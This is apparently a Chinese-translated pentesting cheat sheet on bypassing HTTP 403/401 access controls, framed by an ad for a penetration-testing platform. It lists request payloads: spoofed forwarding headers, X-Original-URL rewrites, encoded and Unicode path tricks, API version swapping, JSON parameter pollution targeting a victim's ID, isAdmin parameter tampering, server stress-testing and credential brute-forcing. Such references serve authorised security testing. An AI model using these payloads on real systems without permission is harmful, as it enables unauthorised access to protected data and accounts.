403 & 401 Bypasses
最后更新于
最后更新于
即时可用的漏洞评估和渗透测试设置。从侦察到报告,使用20多种工具和功能进行完整的渗透测试。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出shell并享受乐趣。
尝试使用不同的动词访问文件:GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
检查响应头,也许会提供一些信息。例如,对于带有Content-Length: 55
的HEAD响应200,意味着HEAD动词可以访问信息。但您仍然需要找到一种方法来外泄该信息。
使用类似X-HTTP-Method-Override: PUT
的HTTP头可以覆盖使用的动词。
使用**TRACE
动词,如果非常幸运,也许在响应中您还可以看到由中间代理添加的头信息**,这可能会很有用。
将Host头部更改为某个任意值(在这里有效)
尝试使用其他用户代理访问资源。
模糊HTTP头部:尝试使用HTTP代理头部、HTTP身份验证基本和NTLM暴力破解(仅使用少量组合)和其他技术。为了执行所有这些操作,我创建了工具fuzzhttpbypass。
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost
如果路径受到保护,您可以尝试使用以下其他头部来绕过路径保护:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
在模糊HTTP方法的同时,模糊特殊HTTP头部。
删除Host头部,也许您将能够绕过保护。
如果_/path_被阻止:
尝试使用_/_%2e/path _(如果访问被代理阻止,这可能会绕过保护)。也尝试_** /%252e**/path(双URL编码)**
尝试Unicode绕过:/%ef%bc%8fpath(URL编码字符类似于“/”),因此当解码后,它将变为_//path_,也许您已经绕过了_path_名称检查
其他路径绕过:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (ruby)
在以下情况下使用所有此列表:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
其他API绕过:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 未经授权
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 未经授权
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON参数污染)
user_id=ATTACKER_ID&user_id=VICTIM_ID (参数污染)
更改 参数值:从 id=123
--> id=124
向URL添加额外参数:?
id=124
—-> id=124&isAdmin=true
删除参数
重新排列参数
使用特殊字符。
在参数中执行边界测试 — 提供值如 -234 或 0 或 99999999(仅为示例值)。
如果使用HTTP/1.1 尝试使用1.0,甚至测试是否支持2.0。
获取域的 IP 或 CNAME,尝试直接联系。
尝试压力测试服务器发送常见的GET请求(这个家伙在Facebook上成功了)。
更改协议:从http到https,或从https到http
前往https://archive.org/web/,检查过去该文件是否全球可访问。
猜测密码:测试以下常见凭据。您了解受害者的情况吗?或者CTF挑战的名称?
暴力破解: 尝试基本、摘要和NTLM身份验证。
即时可用的漏洞评估和渗透测试设置。从任何地方运行完整的渗透测试,具有从侦察到报告的20多种工具和功能。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出shell并享受乐趣。